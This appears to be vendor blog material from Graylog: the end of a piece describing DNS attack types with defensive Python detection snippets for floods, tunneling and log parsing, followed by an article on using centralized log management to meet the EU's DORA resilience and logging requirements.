These attacks flood a DNS server with requests and traffic. As the server attempts to manage the responses, it becomes overloaded and shuts down.
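A first-pass detection for this kind of flood is a sliding-window request-rate check per source IP. The threshold and window below are illustrative; real baselines depend on your normal query volume:

```python
from collections import defaultdict, deque

class FloodDetector:
    """Flag source IPs exceeding a request-rate threshold in a sliding window."""

    def __init__(self, max_requests=100, window=1.0):
        self.max_requests = max_requests      # requests allowed per window
        self.window = window                  # window length in seconds
        self.seen = defaultdict(deque)        # source IP -> request timestamps

    def record(self, src_ip, ts):
        """Record one request; return True if src_ip is currently flooding."""
        q = self.seen[src_ip]
        q.append(ts)
        while q and q[0] <= ts - self.window:  # drop timestamps outside the window
            q.popleft()
        return len(q) > self.max_requests
```

Note this only spots single-source floods; a DDoS spreads traffic across many sources, so per-IP counters must be complemented by aggregate volume monitoring.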

 

DNS amplification attacks

One DDoS attack type is DNS amplification, in which malicious actors send high volumes of DNS name lookup requests to publicly accessible, open DNS servers. Instead of using their own IP in the source address, the attackers spoof the target’s address so that the DNS server responds to the target.

 

DNS hijacking

In a DNS hijacking attack, malicious actors make unauthorized changes to DNS settings that redirect users to deceptive or malicious websites. Varieties of DNS hijacking include:

  • Cache poisoning: inserting false data into the DNS server’s cache to redirect users when they try to access the website
  • Server hijacking: gaining unauthorized access to a domain’s DNS records and changing A or AAAA records that redirect users to a malicious IP address or attacker-controlled server

 

DNS Spoofing

DNS spoofing, also called DNS poisoning, exploits security gaps in the DNS protocol. The attacker gets in between the browser and the DNS server to supply the wrong response, diverting traffic to the malicious website.

 

DNS tunneling

DNS tunneling is a sophisticated attack in which malicious actors encode data inside DNS queries and responses, turning the communication path between browser and server into a covert channel. This enables them to bypass several defensive technologies, including:

  • Filters
  • Firewalls
  • Packet capture

 

This process routes queries to a command and control (C2) server, enabling them to steal information.
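Tunneled data tends to show up as unusually long or high-entropy DNS labels, which suggests a simple heuristic. The length and entropy cutoffs below are illustrative starting points, not tuned detection values:

```python
import math
from collections import Counter

def shannon_entropy(s):
    """Bits of entropy per character in the string `s`."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_like_tunneling(qname, max_label_len=40, entropy_cutoff=4.0):
    """Heuristic: very long or high-entropy DNS labels often carry encoded data."""
    labels = qname.rstrip(".").split(".")
    return any(len(label) > max_label_len or shannon_entropy(label) > entropy_cutoff
               for label in labels if label)
```

A normal name like `www.example.com` passes, while a 50-character encoded label trips the check; in practice you would also baseline query volume per domain, since tunneling produces many such lookups.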

 

DNS Logging Best Practices for Improved Security

Whether you build your own DNS infrastructure or use a managed service, you should integrate your DNS logs into your overarching security monitoring. While the logs should provide similar information, the fields used change based on your DNS server’s vendor. However, you should look for log fields supporting the following categories and event types.
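As an example of extracting those fields, the snippet below parses a hypothetical BIND-style query log line. Real layouts vary by DNS server vendor and logging configuration, so treat the pattern as a template to adapt, not a universal format:

```python
import re

# Hypothetical BIND-style query log line; adjust the pattern to match the
# exact format your DNS server emits.
QUERY_LOG_RE = re.compile(
    r"client (?P<client_ip>[\d.]+)#\d+ .*?query: (?P<qname>\S+) (?P<qclass>\S+) (?P<qtype>\S+)"
)

def parse_query_log(line):
    """Extract client IP, query name, class, and type; None if no match."""
    m = QUERY_LOG_RE.search(line)
    return m.groupdict() if m else None
```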

Zone operations

In DNS-speak, the zone refers to the domain. Some data you should consider collecting include log fields related to the creation, deletion, or modification to:

  • Zones
  • Records
  • Nodes

 

DNS Security Extensions (DNSSEC)

DNSSEC is a set of extensions that use digital signatures to authenticate DNS queries and responses. Some data you should consider collecting include log fields related to:

  • Addition of new keys or trust points
  • Removal of keys or trust points
  • Exports of metadata

 

Policies

DNS policies allow you to:

  • Balance traffic loads
  • Assign DNS clients based on geographic location
  • Create zones
  • Manage query filters
  • Redirect malicious DNS requests to a non-existent IP address

 

Some data you should consider collecting include log fields related to the creation, deletion, or modification of:

  • Client subnet records
  • Server level policies
  • Forwarding policies
  • Zone policies

 

Graylog Security: Correlating DNS Log Events

DNS logs are often difficult to parse, sometimes creating a blind spot in DNS security monitoring. Graylog Security offers out-of-the-box content that streamlines this process so you can rapidly set up and start monitoring your DNS security.

Our prebuilt content maps security events to MITRE ATT&CK. By combining Sigma rules and MITRE ATT&CK, you can create high-fidelity alerting rules that enable robust threat detection, lightning-fast investigations, and streamlined threat hunting. For example, with Graylog’s security analytics, you can monitor user activity for anomalous behavior indicating a potential security incident. By mapping this activity to the MITRE ATT&CK Framework, you can detect and investigate adversary attempts at using Valid Accounts to gain Initial Access, mitigating risk by isolating compromised accounts earlier in the attack path and reducing impact.
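The core idea of a Sigma-style detection can be sketched in a few lines. The rule structure below mirrors Sigma's detection/selection concept, but the field names and values are illustrative, and this matcher supports only exact-match selections, not the full Sigma condition language:

```python
# Simplified Sigma-style rule; fields and values are illustrative.
rule = {
    "title": "Successful login from a new geolocation",
    "tags": ["attack.t1078"],  # MITRE ATT&CK: Valid Accounts
    "detection": {
        "selection": {"event_type": "login", "outcome": "success", "new_geolocation": True},
    },
}

def matches(rule, event):
    """Return True when every selection field equals the event's value."""
    selection = rule["detection"]["selection"]
    return all(event.get(field) == value for field, value in selection.items())
```

An event carrying all three selection fields fires the rule; an event missing any of them does not, which is what keeps the alert high-fidelity.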

Graylog’s risk scoring capabilities enable you to streamline your threat detection and incident response (TDIR) by aggregating and correlating the severity of the log message and event definitions with the associated asset, reducing alert fatigue and allowing security teams to focus on high-value, high-risk issues.


Centralized Log Management for the Digital Operational Resilience Act (DORA)

The financial services industry has been a threat actor target since before digital transformation was even a term. Further, financial services organizations find themselves continuously under scrutiny. As members of a highly regulated industry, these companies need to comply with various laws to ensure that they effectively protect sensitive data.

The adoption of the Digital Operational Resilience Act (DORA) places additional resilience compliance requirements on the European financial sector, ones that centralized log management can help them manage.

What is the Digital Operational Resilience Act (DORA)?

Formally adopted by the European Parliament and applying from January 17, 2025, the Digital Operational Resilience Act (DORA) establishes uniform network and information system security requirements across the financial sector and the third parties that provide Information Communication Technology (ICT) services, including cloud platforms and data analytics services.

The DORA regulatory framework requires organizations to make sure they can withstand, respond to, and recover from ICT-related disruptions and threats. It sets out standardized requirements for preventing and mitigating cyber threats across all European Union (EU) member states.

Who will DORA apply to?

To achieve DORA’s resilience goals, the regulation applies to a long list of entities within the financial services industry and third-parties that enable them, including:

  • Credit institutions
  • Payment institutions
  • Account information service providers
  • Electronic money institutions
  • Investment firms
  • Crypto-asset services providers
  • Central security depositories
  • Central counterparties
  • Trading venues and repositories
  • Managers of alternate investment funds
  • Management companies
  • Data reporting service providers
  • Insurance and reinsurance undertakings
  • Insurance, reinsurance, and ancillary insurance intermediaries
  • Institutions for occupational retirement provision
  • Credit rating agencies
  • Administrators of critical benchmarks
  • Crowdfunding service providers
  • Securitisation repositories
  • ICT third-party service providers

What are DORA’s key provisions?

Section II outlines DORA’s key requirements, including:

  • Article 6 ICT risk management framework: strategies, policies, procedures, ICT protocols and tools necessary to protect information and ICT assets
  • Article 7 ICT systems, protocols and tools: use and maintain updated ICT systems, protocols and tools that are appropriate to operational magnitude, reliable, equipped with sufficient capacity, and technologically resilient
  • Article 8 Identification: identify, classify, document, and engage in a risk analysis for all information and ICT assets and processes, including those on remote sites, network resources, and hardware equipment
  • Article 9 Protection and prevention: develop, document, implement, and maintain security policies and technical controls that protect data confidentiality, integrity, availability, and authenticity and continuously monitor the effectiveness of controls
  • Article 10 Detection: implement mechanisms and provide sufficient resources to monitor and detect, across multiple layers of control, anomalous activity by using defined thresholds and criteria that trigger and initiate incident response processes
  • Article 11 Response and recovery: establish and implement an ICT business continuity policy based on a business impact analysis (BIA) that includes dedicated, appropriate, documented, and tested arrangements, plans, procedures, and mechanisms for ensuring critical functions, responding to and resolving incidents, enable incident containment, estimate preliminary impact, damage, and losses, and establish communications and crisis management activities
  • Article 12 Backup policies and procedures, restoration and recovery procedures and methods: develop, document, implement, and test backup, restoration, and recovery policies, procedures, methods, and service level agreements that can be activated without jeopardizing network or information system security or data availability, authenticity, integrity, or confidentiality
  • Article 13 Learning and evolving: implement capabilities and staff to gather vulnerability and cyber threat information, develop ICT-security awareness programs, and review incident detection, response, forensic analysis, escalation, and internal and external communication capabilities to improve business continuity
  • Article 14 Communication: implement crisis communications plans and policies that inform internal staff and external stakeholders about ICT-related incidents or vulnerabilities

For small and non-interconnected investment firms, payment institutions, electronic money institutions, and occupational retirement provisions, or other exempt entities, Article 16 articulates a simplified ICT risk management framework that requires:

  • Implementing and maintaining an ICT risk management framework with mechanisms and measures that mitigate risk
  • Continuously monitoring ICT system security and functioning
  • Protecting data availability, authenticity, integrity, and confidentiality using sound, resilient, and updated ICT systems, protocols, and tools
  • Promptly identifying and detecting ICT-related risks, incidents, and anomalous activities
  • Identifying key ICT third-party service provider dependencies
  • Implementing business continuity plans, response, and recovery measures, including backup and restoration
  • Testing risk mitigation measures, data protections, and business continuity plans
  • Implementing changes based on tests and post-incident analyses, including changes to ICT risk profile, ICT security awareness programs, and staff and management digital operational resilience training

The Regulatory Technical Standards

On January 17, 2024, the final draft of the Regulatory Technical Standards was published. Under Section V ICT Operations Security, Article 12 Logging defines acceptable procedures, protocols, and tools.

The logging procedures and protocols should:

  • Identify the events to log
  • Retain logs for an appropriate time
  • Enable the secure handling of log data

When using logs to detect anomalous activities, organizations are required to collect log events related to the following:

  • Identity and access, including logical and physical access control
  • Capacity management
  • Change management
  • ICT operations, including system activities
  • Network traffic, including performance

The details captured in the logs should align with their purpose and usage to enable accurate alerting and forensic analysis. Under Chapter III, Article 23, organizations shall implement detection mechanisms allowing them to:

  • Collect, monitor, and analyze internal and external factors, including logs collected according to Article 12
  • Generate alerts for identifying anomalous activities and behaviors with automated alerts based on predefined rules
  • Prioritize alerts to manage incidents within the required timeframe
  • Record, analyze, and evaluate relevant information on all abnormal activities and behaviors either automatically or manually

When establishing the criteria that trigger threat detection and incident response (TDIR), organizations shall consider the following:

  • Indications that malicious actors carried out malicious activity or compromised a system or network
  • Data losses detected that impact data availability, authenticity, integrity, and confidentiality
  • Adverse impact on transactions and operations detected
  • System and network unavailability

Compliance Monitoring For DORA Compliance

Centralized log management with security analytics enables you to continuously monitor your environment and create high-fidelity alerts that enable faster response, investigation, and recovery. To help you meet DORA compliance requirements, you can use your centralized log management solution to support:

  • Access monitoring
  • Network monitoring
  • Endpoint security
  • Patch management
  • Data exfiltration/data loss
  • Incident response

Further, it enables many of DORA’s key requirements, including:

Access Monitoring

Your centralized log management solution ingests access logs from across your environment, including on-premises and cloud-based resources. When paired with user and entity behavior analytics (UEBA), it gives you a robust access monitoring solution to detect and investigate anomalous behavior, even within a complex environment.

By using a centralized log management solution with security analytics, you can engage in security functions like:

  • Privileged access management (PAM)
  • Password policy compliance
  • Abnormal privilege escalation
  • Time spent accessing a resource
  • Brute force attack detection

Network Monitoring

When monitoring network security, you’re usually correlating and analyzing data from several different tools.

Your firewalls define the inbound and outbound traffic, giving you the ability to detect suspicious activity like data traveling to a cybercriminal-controlled server.

Intrusion detection systems and intrusion prevention systems (IPS) provide visibility into potential evasion techniques. When combined with your firewall data, you have a more complete story. 

When the centralized log management solution also incorporates security analytics, you can set baselines for normal network traffic that help you detect anomalies for visibility into a potential security incident.

Data exfiltration

With credential-based attacks, malware/ransomware attacks, and Advanced Persistent Threats (APTs) all in play, monitoring your systems for data exfiltration is critical to DORA compliance.

If your centralized log management solution provides security analytics that you can combine with threat intelligence, your dashboards and high-fidelity alerts enable you to more rapidly detect, investigate, and respond to security incidents. 

For example, when you can aggregate your network monitoring and antivirus logs then correlate them with UEBA to detect anomalies, you can create alerts that provide insights into abnormal data downloads indicating a security incident. 
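The aggregate-then-correlate step can be sketched as a time-windowed join across sources. The `host` and `ts` fields and the five-minute window are illustrative assumptions:

```python
from collections import defaultdict

def correlate(firewall_events, antivirus_events, window=300):
    """Pair firewall and antivirus events on the same host within `window` seconds.

    Events are dicts with "host" and "ts" (epoch seconds) fields; a pair of
    corroborating events from independent sources is the kind of
    high-fidelity signal worth alerting on.
    """
    by_host = defaultdict(list)
    for av in antivirus_events:
        by_host[av["host"]].append(av)
    hits = []
    for fw in firewall_events:
        for av in by_host.get(fw["host"], []):
            if abs(fw["ts"] - av["ts"]) <= window:
                hits.append((fw, av))
    return hits
```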

Incident response and automated threat hunting

With lightning fast search and proactive threat hunting capabilities, you can implement a robust incident response plan that enables digital resilience. 

For example, if you can create queries using parameters instead of specific values, you can optimize search for real-time answers. 

To take a proactive approach, you can create parameterized searches that look for advanced threat activities like:

  • Abnormal user access to sensitive information
  • Abnormal time of day and location of access
  • High volumes of files accessed
  • Higher than normal CPU, memory, or disk utilization
  • Higher than normal network traffic
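The parameterized-search idea above amounts to writing the query template once and swapping in values per hunt. The query syntax below is a hypothetical illustration, not any particular product's search language:

```python
# Hypothetical search template: written once, parameterized per hunt.
SEARCH_TEMPLATE = "action:{action} AND user:{user} AND bytes:>{min_bytes}"

def build_query(action, user, min_bytes):
    """Fill the reusable hunt template with concrete parameter values."""
    return SEARCH_TEMPLATE.format(action=action, user=user, min_bytes=min_bytes)
```

The same template then serves many hunts: large downloads by one user today, a different user or threshold tomorrow, without rewriting the query.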

Compliance reporting and post-incident learning

Your senior leadership team needs to know what happened and how quickly you responded, but it may not need the deep technical details. Your centralized log management solution’s dashboards can provide the high-level visualizations that enable everyone to evaluate the security incident after you restore and recover your systems.

For example, you could use a dashboard to show:

  • Start of incident: when logs documented changes
  • Incident activities: what types of changes the logs documented to highlight what the threat actor tried to do
  • Containment/Eradication: when logs stop reporting the activities indicating the threat actor is no longer acting in the system

Graylog Security: Security analytics without complexity

With Graylog’s security analytics and anomaly detection capabilities, you get the cybersecurity platform you need without the complexity that makes your team’s job harder. With our powerful, lightning-fast features and intuitive user interface, you can lower your labor costs while reducing alert fatigue and getting the answers you need – quickly.

Our prebuilt search templates, dashboards, correlated alerts, and dynamic look-up tables enable you to get immediate value from your logs while empowering your security team.

 

